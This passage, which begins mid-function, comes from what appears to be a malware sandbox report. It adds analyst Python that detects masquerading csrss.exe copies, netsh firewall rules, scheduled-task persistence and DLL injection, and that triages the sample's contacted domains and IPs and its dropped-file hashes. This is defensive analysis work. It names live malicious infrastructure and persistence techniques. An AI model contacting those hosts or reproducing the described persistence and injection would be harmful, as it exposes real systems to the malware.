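    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        parts = cmdline.split('"', 2)
        return parts[1] if len(parts) > 1 else cmdline
    return cmdline.split(" ", 1)[0]


def analyze(cmdlines):
    """Run the four rules over each command line; return de-duplicated findings in first-seen order."""
    findings = []
    for line in cmdlines:
        if not line.strip():
            continue
        if masquerades(image_of(line)):
            findings.append(Finding("masquerade_exec", _norm(image_of(line))))
        m = _NETSH_ADD.search(line)
        if m and masquerades(m.group(1)):
            findings.append(Finding("firewall_allow_masquerade", _norm(m.group(1))))
        if _SCHTASKS_CREATE.search(line):
            tr = _TR.search(line)
            target = (tr.group(1) or tr.group(2)) if tr else ""
            if masquerades(target):
                rl = " (/RL HIGHEST)" if re.search(r"/RL\s+HIGHEST\b", line, re.I) else ""
                findings.append(Finding("schtask_masquerade", _norm(target) + rl))
        m = _INJECT.match(line.strip())
        if m:
            dll = m.group(3).rsplit("\\", 1)[-1]
            findings.append(Finding("dll_injection", f"{m.group(2).lower()} <- {dll}"))
    seen, unique = set(), []
    for f in findings:  # cmd.exe and the child netsh.exe report the same rule: keep one
        if f not in seen:
            seen.add(f)
            unique.append(f)
    return unique


if __name__ == "__main__":
    for f in analyze(SAMPLE_CMDLINES):
        print(f"{f.rule:28} {f.detail}")
```

The masquerade test is deliberately path-based rather than name-based: the constructed C:\Windows\System32\csrss.exe control produces nothing, and the same check is reused for the firewall rule's program= argument and the task's /TR argument so one weak spot (a system name in a writable directory) is caught wherever it appears in the chain.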

Network

Country  Destination         Domain                                              Proto
US       8.8.8.8:53          13.86.106.20.in-addr.arpa                           udp
US       8.8.8.8:53          190.178.17.96.in-addr.arpa                          udp
US       138.91.171.81:80                                                        tcp
US       8.8.8.8:53          16.53.126.40.in-addr.arpa                           udp
US       8.8.8.8:53          217.106.137.52.in-addr.arpa                         udp
US       8.8.8.8:53          humisnee.com                                        udp
NL       37.48.65.151:443    humisnee.com                                        tcp
US       8.8.8.8:53          apps.identrust.com                                  udp
GB       96.17.179.205:80    apps.identrust.com                                  tcp
US       8.8.8.8:53          151.65.48.37.in-addr.arpa                           udp
US       8.8.8.8:53          104.219.191.52.in-addr.arpa                         udp
US       8.8.8.8:53          205.179.17.96.in-addr.arpa                          udp
US       8.8.8.8:53          survey-smiles.com                                   udp
US       199.59.243.225:80   survey-smiles.com                                   tcp
US       8.8.8.8:53          225.243.59.199.in-addr.arpa                         udp
US       8.8.8.8:53          ninhaine.com                                        udp
US       8.8.8.8:53          2makestorage.com                                    udp
US       8.8.8.8:53          nisdably.com                                        udp
US       8.8.8.8:53          cf4ea508-d72e-4eb6-87d4-a7de1c0f1efe.ninhaine.com   udp
US       8.8.8.8:53          server10.ninhaine.com                               udp
CZ       46.8.8.100:443      server10.ninhaine.com                               tcp
CZ       46.8.8.100:443      server10.ninhaine.com                               tcp
CZ       46.8.8.100:443      server10.ninhaine.com                               tcp
US       8.8.8.8:53          ww82.ninhaine.com                                   udp
US       199.59.243.225:80   ww82.ninhaine.com                                   tcp
US       199.59.243.225:80   ww82.ninhaine.com                                   tcp
US       199.59.243.225:80   ww82.ninhaine.com                                   tcp
US       8.8.8.8:53          100.8.8.46.in-addr.arpa                             udp
US       8.8.8.8:53          spolaect.info                                       udp
US       8.8.8.8:53          157.123.68.40.in-addr.arpa                          udp
US       8.8.8.8:53          15.164.165.52.in-addr.arpa                          udp
US       8.8.8.8:53          18.134.221.88.in-addr.arpa                          udp
US       8.8.8.8:53          0.205.248.87.in-addr.arpa                           udp
US       8.8.8.8:53          19.229.111.52.in-addr.arpa                          udp
CZ       46.8.8.100:443      server10.ninhaine.com                               tcp
US       199.59.243.225:80   ww82.ninhaine.com                                   tcp
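
The Network table mixes three kinds of event: forward DNS queries to 8.8.8.8, reverse (PTR) queries under in-addr.arpa, and TCP connections, one of them with no domain at all. PTR names carry the address octets in reverse order, so 151.65.48.37.in-addr.arpa is a lookup for 37.48.65.151, the humisnee.com endpoint contacted a few rows earlier, and 100.8.8.46.in-addr.arpa is a lookup for the server10.ninhaine.com endpoint. The Python below is an added example for this report, not sandbox output or tooling: it decodes the PTR names, separates addresses the sample also connected to from ones it only reverse-resolved, lists domains resolved but never connected to, flags the UUID-labelled host under ninhaine.com as a likely per-host identifier, and reports IPs shared by more than one domain (199.59.243.225 serves both survey-smiles.com and ww82.ninhaine.com in this capture). NETWORK_ROWS is a copied subset of the table; the classification logic and the UUID-label heuristic are my assumptions.

```python
"""Turn the flat Network table above into a triage-ready IOC view.

Added example for this report, not sandbox output or tooling. NETWORK_ROWS is
a subset of the table above, copied row by row; the classification logic and
the "id-like host" heuristic are my assumptions.
"""
import ipaddress
import re
from collections import defaultdict

NETWORK_ROWS = """
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 humisnee.com udp
NL 37.48.65.151:443 humisnee.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 151.65.48.37.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 survey-smiles.com udp
US 199.59.243.225:80 survey-smiles.com tcp
US 8.8.8.8:53 cf4ea508-d72e-4eb6-87d4-a7de1c0f1efe.ninhaine.com udp
US 8.8.8.8:53 server10.ninhaine.com udp
CZ 46.8.8.100:443 server10.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
US 8.8.8.8:53 spolaect.info udp
"""

# Leftmost label shaped like a UUID: reads as a per-host identifier (heuristic, an assumption).
_UUID_LABEL = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.", re.I)
_PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(text):
    """Rows are 'country destination [domain] proto'; the Domain column may be empty."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            cc, dest, domain, proto = parts
        elif len(parts) == 3:
            cc, dest, proto = parts
            domain = ""
        else:
            raise ValueError(f"unexpected row: {line!r}")
        ip, _, port = dest.rpartition(":")
        rows.append({"cc": cc, "ip": ip, "port": int(port), "domain": domain.lower(), "proto": proto})
    return rows


def ptr_to_ip(name):
    """'13.86.106.20.in-addr.arpa' -> '20.106.86.13': PTR names list the octets reversed."""
    name = name.lower()
    if not name.endswith(_PTR_SUFFIX):
        raise ValueError(f"not a PTR name: {name}")
    labels = name[: -len(_PTR_SUFFIX)].split(".")
    if len(labels) != 4:
        raise ValueError(f"not an IPv4 PTR name: {name}")
    return str(ipaddress.IPv4Address(".".join(reversed(labels))))  # validates the result


def triage(rows):
    ioc = {"forward_lookups": set(), "reverse_lookups": {}, "id_like_hosts": set(),
           "connections": defaultdict(set)}
    by_ip = defaultdict(set)
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            if r["domain"].endswith(_PTR_SUFFIX):
                ioc["reverse_lookups"][r["domain"]] = ptr_to_ip(r["domain"])
            else:
                ioc["forward_lookups"].add(r["domain"])
                if _UUID_LABEL.match(r["domain"]):
                    ioc["id_like_hosts"].add(r["domain"])
        elif r["proto"] == "tcp":
            # Key by domain when the table gives one, otherwise by bare IP.
            ioc["connections"][r["domain"] or r["ip"]].add(f'{r["ip"]}:{r["port"]}')
            if r["domain"]:
                by_ip[r["ip"]].add(r["domain"])
    contacted = {ep.rsplit(":", 1)[0] for eps in ioc["connections"].values() for ep in eps}
    ioc["ptr_of_contacted"] = {n: ip for n, ip in ioc["reverse_lookups"].items() if ip in contacted}
    ioc["ptr_uncontacted"] = {n: ip for n, ip in ioc["reverse_lookups"].items() if ip not in contacted}
    ioc["resolved_never_connected"] = ioc["forward_lookups"] - set(ioc["connections"])
    ioc["shared_ips"] = {ip: names for ip, names in by_ip.items() if len(names) > 1}
    return ioc


if __name__ == "__main__":
    for key, value in triage(parse_rows(NETWORK_ROWS)).items():
        print(f"{key}: {value}")
```

Running it over the full table rather than the subset is a matter of pasting the remaining rows into NETWORK_ROWS; the three-token rows (no Domain) are the reason the parser branches on field count instead of fixed positions.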

Files

memory/1116-1-0x0000000005020000-0x0000000005466000-memory.dmp

memory/1116-2-0x0000000005470000-0x0000000005D96000-memory.dmp

memory/1116-3-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1116-4-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1116-6-0x0000000005470000-0x0000000005D96000-memory.dmp

memory/4392-7-0x0000000004D40000-0x0000000005181000-memory.dmp

memory/4392-8-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 a38abd5135bd7dd303e36d98b66ba72a
SHA1 f964b8b231631cb299e40565b93afbc39ee37959
SHA256 fab958b19764e9d129d91caaf0631a76ebc4697a5080d6e331dc27d924621b45
SHA512 06032e323cccd5ef99afe6bc1b799a7273c2c82ad843b65af1497847f11093ac33b5d414ed82b4039950f4067f5625badaddc501e501084b5f0da2bfe6f13fdd

C:\Windows\rss\csrss.exe

MD5 fdc2ab5431888ecf6f7c0e674e8812d9
SHA1 e62c381ac3b782e2f5b82bae97c797757d0e375b
SHA256 fb70708694f1d8d7881fcced3dc6d8319affe8db6ce3bd91591bc1826a22fabe
SHA512 3b97e3a723fd4cb04a37328bb7f6fe2acd3eaaf470c1161aa61bb7755163f76fbd45b4e46f5a7ab907e61c6056e9e082118d420f17a510761b2b7d62ac67b8d7

memory/4392-18-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-19-0x0000000005200000-0x0000000005700000-memory.dmp

memory/4676-20-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-21-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 25475beab23b020b3b25e215333f4db1
SHA1 dba5b352c8df85dcdef4c7206a8410bbcb32fca8
SHA256 451a6c64803fc2257eb8520893dad30e264c3005535f6305bab233797095d096
SHA512 8dd0997a8418f10118f99fe72036d633917c6951d4210685d5f38956fe34a10913ee8e7bb02f808defb4d571eeeb086a804fb259b8d3e8d261a4f974662e917a

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 395ae7c9cccebd73de9e6de2d543279d
SHA1 2805fbce7d93fe5258269247af4033f211561820
SHA256 846af15e1c9c6b2e76e87a35943266de1b15ed2564e67bcae7040ecabbde53a6
SHA512 063544b4fb4b8b228f39c1ee4b98b2f1c7f091c158793271f18272c23d13a0cc3a87442b02d9887d594a73a80a9adb26c0369126924a66d9541c3335892da892

memory/4676-27-0x0000000005200000-0x0000000005700000-memory.dmp

memory/4676-28-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-29-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-30-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-31-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-32-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-33-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-34-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-35-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-36-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-37-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-38-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-39-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-40-0x0000000000400000-0x00000000030EF000-memory.dmp
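
Two things in the Files list deserve a check before the hashes go into a blocklist: C:\Windows\rss\csrss.exe and the injector.exe path each appear twice with different MD5/SHA1/SHA256/SHA512 values, so each path was observed with two different contents during the run and both hash sets are valid indicators; and the memory dumps for PIDs 1116, 4392 (the sample, run twice) and 4676 (the dropped csrss.exe) all cover the same 0x400000-0x30EF000 range, so the dropped file maps an image of the same size as the original even though none of its hashes match the original's MD5. The Python below is an added example for this report, not sandbox tooling: it parses a copied subset of the listing (MD5 and SHA256 lines only), validates hash lengths before they are reused, groups SHA256 values per path and dump ranges per PID. The grouping logic is mine.

```python
"""Sanity-check and group the dropped-file hashes and memory dumps listed above.

Added example for this report, not sandbox tooling. FILES_SECTION is a subset of
the Files section above (MD5 and SHA256 lines only), copied verbatim; the
grouping logic is mine.
"""
import re
from collections import defaultdict

FILES_SECTION = r"""
memory/1116-3-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4392-8-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Windows\rss\csrss.exe
MD5 a38abd5135bd7dd303e36d98b66ba72a
SHA256 fab958b19764e9d129d91caaf0631a76ebc4697a5080d6e331dc27d924621b45
C:\Windows\rss\csrss.exe
MD5 fdc2ab5431888ecf6f7c0e674e8812d9
SHA256 fb70708694f1d8d7881fcced3dc6d8319affe8db6ce3bd91591bc1826a22fabe
memory/4676-19-0x0000000005200000-0x0000000005700000-memory.dmp
memory/4676-20-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5 25475beab23b020b3b25e215333f4db1
SHA256 451a6c64803fc2257eb8520893dad30e264c3005535f6305bab233797095d096
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5 395ae7c9cccebd73de9e6de2d543279d
SHA256 846af15e1c9c6b2e76e87a35943266de1b15ed2564e67bcae7040ecabbde53a6
"""

HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_DUMP = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
_HASH = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+(\S+)$", re.I)


def parse_files(text):
    """Split the listing into memory-dump entries and file entries with their hash lines."""
    dumps, files = [], []
    for line in (raw.strip() for raw in text.strip().splitlines()):
        if not line:
            continue
        m = _DUMP.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq), "start": int(start, 16), "end": int(end, 16)})
            continue
        m = _HASH.match(line)
        if m:
            if not files:
                raise ValueError("hash line before any file path: " + line)
            files[-1]["hashes"][m.group(1).upper()] = m.group(2).lower()
            continue
        files.append({"path": line, "hashes": {}})  # anything else starts a new file entry
    return dumps, files


def malformed_hashes(files):
    """(path, algo) for hash values that are the wrong length or not hex; expect an empty list."""
    bad = []
    for f in files:
        for algo, value in f["hashes"].items():
            if len(value) != HEX_LEN[algo] or not re.fullmatch(r"[0-9a-f]+", value):
                bad.append((f["path"], algo))
    return bad


def sha256_by_path(files):
    """Distinct SHA256 values per path, in listing order: every value is an indicator."""
    out = defaultdict(list)
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha and sha not in out[f["path"]]:
            out[f["path"]].append(sha)
    return dict(out)


def rewritten_paths(files):
    """Paths listed with more than one SHA256: the content at that path changed during the run."""
    return {p for p, shas in sha256_by_path(files).items() if len(shas) > 1}


def pids_by_region(dumps):
    """Which PIDs had a dump taken over the same (start, end) range."""
    out = defaultdict(set)
    for d in dumps:
        out[(d["start"], d["end"])].add(d["pid"])
    return {region: sorted(pids) for region, pids in out.items()}


if __name__ == "__main__":
    dumps, files = parse_files(FILES_SECTION)
    print("malformed hashes:", malformed_hashes(files))
    for path, shas in sha256_by_path(files).items():
        print(path, "->", shas)
    for (start, end), pids in pids_by_region(dumps).items():
        print(f"0x{start:X}-0x{end:X} ({end - start:#x} bytes): PIDs {pids}")
```

The length check is the cheap guard against a hash truncated by copy-and-paste or report rendering; the rest is what a hunt team needs from this section, namely one indicator list per path and the fact that the same image range recurs across the three PIDs.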